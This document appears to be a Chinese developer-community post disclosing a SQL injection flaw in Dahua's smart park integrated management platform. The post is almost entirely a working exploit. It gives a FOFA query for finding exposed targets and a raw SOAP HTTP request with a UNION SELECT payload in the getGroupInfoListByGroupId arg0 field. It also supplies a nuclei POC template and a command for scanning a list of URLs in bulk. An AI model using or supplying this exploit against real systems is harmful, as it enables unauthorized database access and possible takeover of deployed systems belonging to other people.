1、fofa语句
app="dahua-智慧园区综合管理平台"
2、数据包
POST /portal/services/clientServer HTTP/1.1
Host: XXXXXXXXXXXXX
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<cli:getGroupInfoListByGroupId>
<!--type: string-->
<arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
<!--type: long-->
<arg1>1</arg1>
</cli:getGroupInfoListByGroupId>
</soapenv:Body>
</soapenv:Envelope>
3、nuclei POC
基本命令: nuclei.exe -l 网址文件.txt -t POC.yaml
id: dahua-getNewStaypointDetailQuery-sqli
info:
name: 由于大华智慧园区综合管理平台clientServer接口处未对用户的输入进行有效的过滤
author: someone
severity: critical
description: 由于大华智慧园区综合管理平台clientServer接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
metadata:
verified: true
max-request: 1
fofa-query: FOFA:app="dahua-智慧园区综合管理平台"
tags: sqli
requests:
- raw:
- |
POST /portal/services/clientServer HTTP/1.1
Host: {{Hostname}}
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<cli:getGroupInfoListByGroupId>
<!--type: string-->
<arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
<!--type: long-->
<arg1>1</arg1>
</cli:getGroupInfoListByGroupId>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "<soap:Envelope"
- "getGroupInfoListByGroupIdResponse"
part: body
- type: regex
regex:
- "\"groupdetail\":\"([\\d\\.]+-log)\""
part: body
condition: or
- type: status
status:
- 200
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。